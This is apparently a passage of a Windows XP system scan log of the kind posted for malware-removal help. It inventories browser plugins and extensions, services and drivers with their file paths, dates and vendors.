    Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files\Skype\Toolbars\Internet Explorer\skypeieplugin.dll [2013-10-09] (Skype Technologies S.A.)
    Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll [2013-02-26] (Skype Technologies)
    Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl.dll [2014-04-25] (McAfee, Inc.)
    ShellExecuteHooks: Microsoft AntiMalware ShellExecuteHook - {091EB208-39DD-417D-A5DD-7E2C2D8FB9CB} - C:\Program Files\Windows Defender\MpShHook.dll [83224 2006-11-03] (Microsoft Corporation)
    Winsock: Catalog5 04 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
    Tcpip\Parameters: [DhcpNameServer] 209.18.47.61 209.18.47.62

    FireFox:
    ========
    FF ProfilePath: C:\Documents and Settings\RAUL_104\Application Data\Mozilla\Firefox\Profiles\ksds0365.default
    FF DefaultSearchEngine: Google
    FF DefaultSearchEngine.US: Google
    FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF32_17_0_0_134.dll [2015-03-24] ()
    FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll [2012-10-31] ()
    FF Plugin: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files\DivX\DivX Plus Web Player\npdivx32.dll [2011-12-13] (DivX, LLC)
    FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 -> C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll [2011-06-20] (DivX, LLC.)
    FF Plugin: @java.com/DTPlugin,version=10.25.2 -> C:\WINDOWS\system32\npDeployJava1.dll [2013-09-08] (Oracle Corporation)
    FF Plugin: @java.com/JavaPlugin,version=10.25.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2013-09-08] (Oracle Corporation)
    FF Plugin: @logitech.com/HarmonyRemote,version=1.0.0 -> C:\Program Files\Logitech\Harmony Remote Driver\NprtHarmonyPlugin.dll [2012-09-28] (Logitech Inc.)
    FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2014-04-25] ()
    FF Plugin: @mcafee.com/MVT -> C:\Program Files\McAfee\Supportability\MVT\NPMVTPlugin.dll [2013-02-05] (McAfee, Inc.)
    FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll [2014-05-13] ( Microsoft Corporation)
    FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-29] (Microsoft Corporation)
    FF Plugin: @movenetworks.com/Quantum Media Player -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll [2009-12-06] (Move Networks)
    FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-05] (Google Inc.)
    FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-05] (Google Inc.)
    FF Plugin: @viewpoint.com/VMP -> C:\Program Files\Viewpoint\Viewpoint Media Player\npViewpoint.dll [2007-04-16] ()
    FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2012-12-18] (Adobe Systems Inc.)
    FF Plugin HKU\S-1-5-21-515967899-117609710-839522115-1004: @movenetworks.com/Quantum Media Player -> C:\Documents and Settings\RAUL_104\Application Data\Move Networks\plugins\npqmp071701000002.dll [2009-12-06] (Move Networks)
    FF Plugin HKU\S-1-5-21-515967899-117609710-839522115-1004: @tools.google.com/Google Update;version=3 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-04] (Google Inc.)
    FF Plugin HKU\S-1-5-21-515967899-117609710-839522115-1004: @tools.google.com/Google Update;version=9 -> C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Update\1.3.26.9\npGoogleUpdate3.dll [2015-02-04] (Google Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npDivxPlayerPlugin.dll [2009-05-18] (DivX, Inc)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npdnu.dll [2009-07-07] (AOL LLC)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npdnupdater2.dll [2009-07-07] (AOL LLC)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\nppdf32.dll [2012-12-18] (Adobe Systems Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin2.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin3.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin4.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin5.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin6.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npqtplugin7.dll [2012-12-01] (Apple Inc.)
    FF Plugin ProgramFiles/Appdata: C:\Program Files\mozilla firefox\plugins\npViewpoint.dll [2007-04-16] ()
    FF SearchPlugin: C:\Program Files\mozilla firefox\browser\searchplugins\McSiteAdvisor.xml [2014-12-20]
    FF Extension: Microsoft .NET Framework Assistant - C:\Documents and Settings\RAUL_104\Application Data\Mozilla\Firefox\Profiles\ksds0365.default\Extensions\{20a82645-c095-46ed-80e3-08825760534b} [2012-02-28]
    FF Extension: Skype Click to Call - C:\Program Files\Mozilla Firefox\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2015-03-24]
    FF Extension: Skype Click to Call - C:\Program Files\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A} [2015-03-24]
    FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
    FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-08-07]
    FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files\McAfee\SiteAdvisor
    FF Extension: McAfee SiteAdvisor - C:\Program Files\McAfee\SiteAdvisor [2012-06-24]
    FF HKLM\...\Firefox\Extensions: [{23fcfd51-4958-4f00-80a3-ae97e717ed8b}] - C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5
    FF Extension: No Name - C:\Program Files\DivX\DivX Plus Web Player\firefox\DivXHTML5 [2012-08-29]
    FF HKU\S-1-5-21-515967899-117609710-839522115-1004\...\Firefox\Extensions: [[email protected]] - C:\Documents and Settings\RAUL_104\Application Data\Move Networks
    FF Extension: Move Media Player - C:\Documents and Settings\RAUL_104\Application Data\Move Networks [2009-03-27]

    Chrome:
    =======
    CHR Profile: C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default
    CHR Extension: (YouTube) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2011-12-16]
    CHR Extension: (Google Search) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2011-12-16]
    CHR Extension: (SiteAdvisor) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2015-02-26]
    CHR Extension: (Skype Click to Call) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2013-08-20]
    CHR Extension: (Google Wallet) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-02-26]
    CHR Extension: (MyHarmony Chrome Plugin) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\omaonpoimgkmbllpdihbnmgphjoipdhf [2015-02-26]
    CHR Extension: (Gmail) - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2011-12-16]
    CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files\McAfee\SiteAdvisor\McChPlg.crx [2012-06-24]
    CHR HKLM\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files\Skype\Toolbars\Skype for Chromium\skype_chrome_extension.crx [2013-10-09]
    CHR HKLM\...\Chrome\Extension: [nneajnkjbffgblleaoojgaacokifdkhm] - No Path Or update_url value
    CHR HKLM\...\Chrome\Extension: [omaonpoimgkmbllpdihbnmgphjoipdhf] - C:\Program Files\Logitech\Harmony Remote Driver\harmony_chrome.crx [2014-01-28]
    StartMenuInternet: chrome.exe - C:\Documents and Settings\RAUL_104\Local Settings\Application Data\Google\Chrome\Application\chrome.exe

    ========================== Services (Whitelisted) =================

    (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

    R2 ABBYY.Licensing.FineReader.Corporate.11.0; C:\Program Files\Common Files\ABBYY\FineReader\11.00\Licensing\CE\NetworkLicenseServer.exe [818952 2011-12-22] (ABBYY)
    S4 ACDaemon; C:\Program Files\Common Files\ArcSoft\Connection Service\Bin\ACService.exe [113152 2010-03-18] (ArcSoft Inc.)
    S4 Alerter; C:\WINDOWS\system32\alrsvc.dll [17408 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 ALG; C:\WINDOWS\System32\alg.exe [44544 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Ati HotKey Poller; C:\WINDOWS\system32\Ati2evxx.exe [602112 2010-05-27] (ATI Technologies Inc.) [File not signed]
    R2 AudioSrv; C:\WINDOWS\System32\audiosrv.dll [42496 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 AVGIDSAgent; C:\Program Files\AVG\AVG2015\avgidsagent.exe [3411408 2015-02-19] (AVG Technologies CZ, s.r.o.)
    R2 avgwd; C:\Program Files\AVG\AVG2015\avgwdsvc.exe [308720 2015-02-19] (AVG Technologies CZ, s.r.o.)
    S4 BITS; C:\WINDOWS\system32\qmgr.dll [409088 2008-04-13] (Microsoft Corporation) [File not signed]
    S2 Browser; C:\WINDOWS\System32\browser.dll [78336 2012-07-06] (Microsoft Corporation) [File not signed]
    S2 ccEvtMgr; C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe [255136 2003-10-20] () [File not signed]
    S3 ccPwdSvc; C:\Program Files\Common Files\Symantec Shared\ccPwdSvc.exe [87200 2003-10-20] () [File not signed]
    S2 ccSetMgr; C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe [234656 2003-10-20] () [File not signed]
    S3 CiSvc; C:\WINDOWS\system32\cisvc.exe [5632 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 ClipSrv; C:\WINDOWS\system32\clipsrv.exe [33280 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Creative Service for CDROM Access; C:\WINDOWS\system32\CTSvcCDA.EXE [44032 1999-12-13] (Creative Technology Ltd) [File not signed]
    R2 CryptSvc; C:\WINDOWS\System32\cryptsvc.dll [62464 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 DcomLaunch; C:\WINDOWS\system32\rpcss.dll [401408 2009-02-09] (Microsoft Corporation) [File not signed]
    R2 Dhcp; C:\WINDOWS\System32\dhcpcsvc.dll [126976 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 dleaCATSCustConnectService; C:\WINDOWS\System32\spool\DRIVERS\W32X86\3\\dleaserv.exe [98984 2010-01-07] ()
    R2 dlea_device; C:\WINDOWS\system32\dleacoms.exe [598696 2010-01-07] ( )
    S3 dmadmin; C:\WINDOWS\System32\dmadmin.exe [224768 2008-04-13] (Microsoft Corp., Veritas Software) [File not signed]
    S3 dmserver; C:\WINDOWS\System32\dmserver.dll [23552 2008-04-13] (Microsoft Corp.) [File not signed]
    R2 Dnscache; C:\WINDOWS\System32\dnsrslvr.dll [45568 2009-04-20] (Microsoft Corporation) [File not signed]
    S3 Dot3svc; C:\WINDOWS\System32\dot3svc.dll [132096 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 EapHost; C:\WINDOWS\System32\eapsvc.dll [33792 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 ERSvc; C:\WINDOWS\System32\ersvc.dll [23040 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Eventlog; C:\WINDOWS\system32\services.exe [110592 2009-02-06] (Microsoft Corporation) [File not signed]
    R3 EventSystem; C:\WINDOWS\system32\es.dll [253952 2008-07-07] (Microsoft Corporation) [File not signed]
    R3 FastUserSwitchingCompatibility; C:\WINDOWS\System32\shsvcs.dll [135168 2009-07-27] (Microsoft Corporation) [File not signed]
    R2 FlipShare Service; C:\Program Files\Flip Video\FlipShare\FlipShareService.exe [455944 2010-05-14] ()
    R2 helpsvc; C:\WINDOWS\PCHealth\HelpCtr\Binaries\pchsvc.dll [38400 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 HidServ; C:\WINDOWS\System32\hidserv.dll [21504 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 hkmsvc; C:\WINDOWS\System32\kmsvc.dll [61440 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 HomeNetSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    R3 HTTPFilter; C:\WINDOWS\System32\w3ssl.dll [15872 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 ImapiService; C:\WINDOWS\system32\imapi.exe [150528 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 ioloSystemService; C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe [4700872 2014-08-12] (iolo technologies, LLC)
    S4 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182184 2013-09-08] (Oracle Corporation)
    R2 lanmanserver; C:\WINDOWS\System32\srvsvc.dll [99840 2010-08-27] (Microsoft Corporation) [File not signed]
    R2 lanmanworkstation; C:\WINDOWS\System32\wkssvc.dll [132096 2009-06-10] (Microsoft Corporation) [File not signed]
    R2 LmHosts; C:\WINDOWS\System32\lmhsvc.dll [13824 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 McAfee SiteAdvisor Service; C:\Program Files\McAfee\SiteAdvisor\McSACore.exe [132160 2015-03-11] (McAfee, Inc.)
    R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [145568 2014-04-25] (McAfee, Inc.)
    U2 mcbootdelaystartsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    R2 McMPFSvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    R2 McNaiAnn; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [472072 2014-09-04] (McAfee, Inc.)
    R2 mcpltsvc; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    R2 McProxy; C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe [281560 2013-07-30] (McAfee, Inc.)
    R2 MemeoBackgroundService; C:\Program Files\WD\WD Anywhere Backup\MemeoBackgroundService.exe [25824 2009-04-17] (Memeo)
    S4 Messenger; C:\WINDOWS\System32\msgsvc.dll [33792 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [655936 2014-08-20] (McAfee, Inc.)
    R2 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [169800 2014-06-20] (McAfee, Inc.)
    R2 mfevtp; C:\WINDOWS\system32\mfevtps.exe [179600 2015-02-11] (McAfee, Inc.)
    S3 mnmsrvc; C:\WINDOWS\system32\mnmsrvc.exe [32768 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 MotoHelper; C:\Program Files\Motorola\MotoHelper\MotoHelperService.exe [223088 2011-04-26] ()
    S3 MSDTC; C:\WINDOWS\system32\msdtc.exe [6144 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 MSIServer; C:\WINDOWS\System32\msiexec.exe [78848 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 napagent; C:\WINDOWS\System32\qagentrt.dll [291328 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 NetDDE; C:\WINDOWS\system32\netdde.exe [111104 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 NetDDEdsdm; C:\WINDOWS\system32\netdde.exe [111104 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 Netlogon; C:\WINDOWS\system32\lsass.exe [13312 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Netman; C:\WINDOWS\System32\netman.dll [198144 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 Nla; C:\WINDOWS\System32\mswsock.dll [245248 2008-06-20] (Microsoft Corporation) [File not signed]
    S3 NtLmSsp; C:\WINDOWS\system32\lsass.exe [13312 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 NtmsSvc; C:\WINDOWS\system32\ntmssvc.dll [435200 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 PLFlash DeviceIoControl Service; C:\Program Files\Nero\Nero BackItUp 4\IoctlSvc.exe [81920 2008-09-24] (Prolific Technology Inc.) [File not signed]
    R2 PlugPlay; C:\WINDOWS\system32\services.exe [110592 2009-02-06] (Microsoft Corporation) [File not signed]
    R2 PolicyAgent; C:\WINDOWS\system32\lsass.exe [13312 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 ProtectedStorage; C:\WINDOWS\system32\lsass.exe [13312 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 RasAuto; C:\WINDOWS\System32\rasauto.dll [88576 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 RasMan; C:\WINDOWS\System32\rasmans.dll [186368 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 RDSessMgr; C:\WINDOWS\system32\sessmgr.exe [141312 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 RemoteAccess; C:\WINDOWS\System32\mprdim.dll [53248 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 RpcLocator; C:\WINDOWS\system32\locator.exe [75264 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 RpcSs; C:\WINDOWS\system32\rpcss.dll [401408 2009-02-09] (Microsoft Corporation) [File not signed]
    S3 RSVP; C:\WINDOWS\system32\rsvp.exe [132608 2004-08-04] (Microsoft Corporation) [File not signed]
    R2 SamSs; C:\WINDOWS\system32\lsass.exe [13312 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 SCardSvr; C:\WINDOWS\System32\SCardSvr.exe [95744 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Schedule; C:\WINDOWS\system32\schedsvc.dll [192512 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 seclogon; C:\WINDOWS\System32\seclogon.dll [18944 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 SENS; C:\WINDOWS\system32\sens.dll [39424 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 SharedAccess; C:\WINDOWS\System32\ipnathlp.dll [331264 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 ShellHWDetection; C:\WINDOWS\System32\shsvcs.dll [135168 2009-07-27] (Microsoft Corporation) [File not signed]
    S4 Skype C2C Service; C:\Documents and Settings\All Users\Application Data\Skype\Toolbars\Skype C2C Service\c2c_service.exe [3275136 2013-10-09] (Skype Technologies S.A.)
    R2 Spooler; C:\WINDOWS\system32\spoolsv.exe [58880 2010-08-17] (Microsoft Corporation) [File not signed]
    R2 srservice; C:\WINDOWS\system32\srsvc.dll [171008 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 SSDPSRV; C:\WINDOWS\System32\ssdpsrv.dll [71680 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 stisvc; C:\WINDOWS\system32\wiaservc.dll [333824 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 svcboot_tdcreqqfu; C:\WINDOWS\system32\iherf\svcboot_tdcreqqfu.dll [239944 2013-09-26] ()
    S3 SysmonLog; C:\WINDOWS\system32\smlogsvc.exe [89600 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 TapiSrv; C:\WINDOWS\System32\tapisrv.dll [249856 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 TermService; C:\WINDOWS\System32\termsrv.dll [295424 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Themes; C:\WINDOWS\System32\shsvcs.dll [135168 2009-07-27] (Microsoft Corporation) [File not signed]
    R2 TrkWks; C:\WINDOWS\system32\trkwks.dll [90112 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 upnphost; C:\WINDOWS\System32\upnphost.dll [185856 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 UPS; C:\WINDOWS\System32\ups.exe [18432 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 Viewpoint Manager Service; C:\Program Files\Viewpoint\Common\ViewpointService.exe [24652 2007-01-04] (Viewpoint Corporation) [File not signed]
    S3 VSS; C:\WINDOWS\System32\vssvc.exe [289792 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 W32Time; C:\WINDOWS\system32\w32time.dll [175104 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 WDBtnMgrSvc.exe; C:\Program Files\Western Digital\WD Drive Manager\WDBtnMgrSvc.exe [102400 2009-05-27] (WDC) [File not signed]
    R2 WebClient; C:\WINDOWS\System32\webclnt.dll [68096 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [13592 2006-11-03] (Microsoft Corporation)
    R2 winmgmt; C:\WINDOWS\system32\wbem\WMIsvc.dll [144896 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 WiselinkPro; C:\Program Files\SAMSUNG\SAMSUNG PC Share Manager\WiselinkPro.exe [6795333 2008-03-03] () [File not signed]
    R2 WMDM PMSP Service; C:\WINDOWS\system32\MsPMSPSv.exe [53520 2000-06-26] (Microsoft Corporation) [File not signed]
    S3 WmdmPmSN; C:\WINDOWS\system32\MsPMSNSv.dll [27136 2006-10-18] (Microsoft Corporation) [File not signed]
    S3 WmiApSrv; C:\WINDOWS\system32\wbem\wmiapsrv.exe [126464 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 WMPNetworkSvc; C:\Program Files\Windows Media Player\WMPNetwk.exe [913408 2006-10-18] (Microsoft Corporation) [File not signed]
    S4 wscsvc; C:\WINDOWS\system32\wscsvc.dll [80896 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 wuauserv; C:\WINDOWS\system32\wuauserv.dll [6656 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 WudfSvc; C:\WINDOWS\System32\WUDFSvc.dll [55808 2006-09-28] (Microsoft Corporation) [File not signed]
    S2 WZCSVC; C:\WINDOWS\System32\wzcsvc.dll [483840 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 xmlprov; C:\WINDOWS\System32\xmlprov.dll [129024 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 WUSB54GCSVC; "C:\Program Files\Compact Wireless-G USB Adapter Wireless Network Monitor\WLService.exe" "WUSB54GC.exe" [X]

    ==================== Drivers (Whitelisted) ====================

    (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

    S3 61883; C:\WINDOWS\System32\DRIVERS\61883.sys [48128 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 ACPI; C:\WINDOWS\System32\DRIVERS\ACPI.sys [187776 2008-04-13] (Microsoft Corporation) [File not signed]
    S4 ACPIEC; C:\WINDOWS\system32\Drivers\ACPIEC.sys [11648 2004-08-04] (Microsoft Corporation) [File not signed]
    S3 aec; C:\WINDOWS\System32\drivers\aec.sys [142592 2008-04-13] (Microsoft Corporation) [File not signed]
    R2 AegisP; C:\WINDOWS\System32\DRIVERS\AegisP.sys [20747 2009-03-26] (Meetinghouse Data Communications) [File not signed]
    R3 Afc; C:\WINDOWS\System32\drivers\Afc.sys [18688 2006-11-10] (Arcsoft, Inc.)
    R1 AFD; C:\WINDOWS\System32\drivers\afd.sys [138496 2011-08-17] (Microsoft Corporation) [File not signed]
    R0 agp440; C:\WINDOWS\System32\DRIVERS\agp440.sys [42368 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 AnyDVD; C:\WINDOWS\System32\Drivers\AnyDVD.sys [104512 2009-12-08] (SlySoft, Inc.)
    R3 Arp1394; C:\WINDOWS\System32\DRIVERS\arp1394.sys [60800 2008-04-13] (Microsoft Corporation) [File not signed]
    S3 AsyncMac; C:\WINDOWS\System32\DRIVERS\asyncmac.sys [14336 2008-04-13] (Microsoft Corporation) [File not signed]
    R0 atapi; C:\WINDOWS\System32\DRIVERS\atapi.sys [96512 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 ati2mtag; C:\WINDOWS\System32\DRIVERS\ati2mtag.sys [4830720 2010-05-27] (ATI Technologies Inc.) [File not signed]
    S3 Atmarpc; C:\WINDOWS\System32\DRIVERS\atmarpc.sys [59904 2008-04-13] (Microsoft Corporation) [File not signed]
    R3 audstub; C:\WINDOWS\System32\DRIVERS\audstub.sys [3072 2001-08-17] (Microsoft Corporation) [File not signed]
    S3 Avc; C:\WINDOWS\System32\DRIVERS\avc.sys [38912 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Avgdiskx; C:\WINDOWS\System32\DRIVERS\avgdiskx.sys [121624 2014-06-18] (AVG Technologies CZ, s.r.o.)
    R1 AVGIDSDriverl; C:\WINDOWS\System32\DRIVERS\avgidsdriverlx.sys [202208 2015-02-19] (AVG Technologies CZ, s.r.o.)
    R0 AVGIDSHX; C:\WINDOWS\System32\DRIVERS\avgidshx.sys [154904 2014-11-18] (AVG Technologies CZ, s.r.o.)
    R1 AVGIDSShim; C:\WINDOWS\System32\DRIVERS\avgidsshimx.sys [21272 2014-06-18] (AVG Technologies CZ, s.r.o.)
    R1 Avgldx86; C:\WINDOWS\System32\DRIVERS\avgldx86.sys [192792 2014-08-28] (AVG Technologies CZ, s.r.o.)
    R0 Avglogx; C:\WINDOWS\System32\DRIVERS\avglogx.sys [265184 2015-02-03] (AVG Technologies CZ, s.r.o.)
    R0 Avgmfx86; C:\WINDOWS\System32\DRIVERS\avgmfx86.sys [107488 2015-01-23] (AVG Technologies CZ, s.r.o.)
    R0 Avgrkx86; C:\WINDOWS\System32\DRIVERS\avgrkx86.sys [27416 2014-06-18] (AVG Technologies CZ, s.r.o.)
    R1 Avgtdix; C:\WINDOWS\System32\DRIVERS\avgtdix.sys [210400 2015-01-16] (AVG Technologies CZ, s.r.o.)
    S3 BCM42RLY; C:\WINDOWS\System32\BCM42RLY.SYS [17992 2005-02-01] (Broadcom Corporation) [File not signed]
    R1 Beep; C:\WINDOWS\system32\Drivers\Beep.sys [4224 2004-08-04] (Microsoft Corporation) [File not signed]
    S3 BTCFilterService; C:\WINDOWS\System32\DRIVERS\motfilt.sys [6016 2009-01-29] (Motorola Inc) [File not signed]
    S4 cbidf2k; C:\WINDOWS\system32\Drivers\cbidf2k.sys [13952 2004-08-04] (Microsoft Corporation) [File not signed]
    S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-13] (Microsoft Corporation) [File not signed]
    S1 Cdaudio; C:\WINDOWS\system32\Drivers\Cdaudio.sys [18688 2004-08-04] (Microsoft Corporation) [File not signed]
    R4 Cdfs; C:\WINDOWS\system32\Drivers\Cdfs.sys [63744 2008-04-13] (Microsoft Corporation) [File not signed]
    R1 Cdrom; C:\WINDOWS\System32\DRIVERS\cdrom.sys [62976 2008-04-13] (Microsoft Corporation) [File not signed]
    S0 cercsr6; C:\WINDOWS\system32\Drivers\cercsr6.sys [39904 2004-12-13] (Adaptec, Inc.) [File not signed]
    R3 cfwids; C:\WINDOWS\System32\drivers\cfwids.sys [62832 2014-06-20] (McAfee, Inc.)
    R3 ctac32k; C:\WINDOWS\System32\drivers\ctac32k.sys [135040 2003-02-20] (Creative Technology Ltd) [File not signed]
    R3 ctaud2k; C:\WINDOWS\System32\drivers\ctaud2k.sys [498688 2003-03-26] (Creative Technology Ltd) [File not signed]
    S3 ctdvda2k; C:\WINDOWS\System32\drivers\ctdvda2k.sys [287920 2003-03-27] (Creative Technology Ltd) [File not signed]
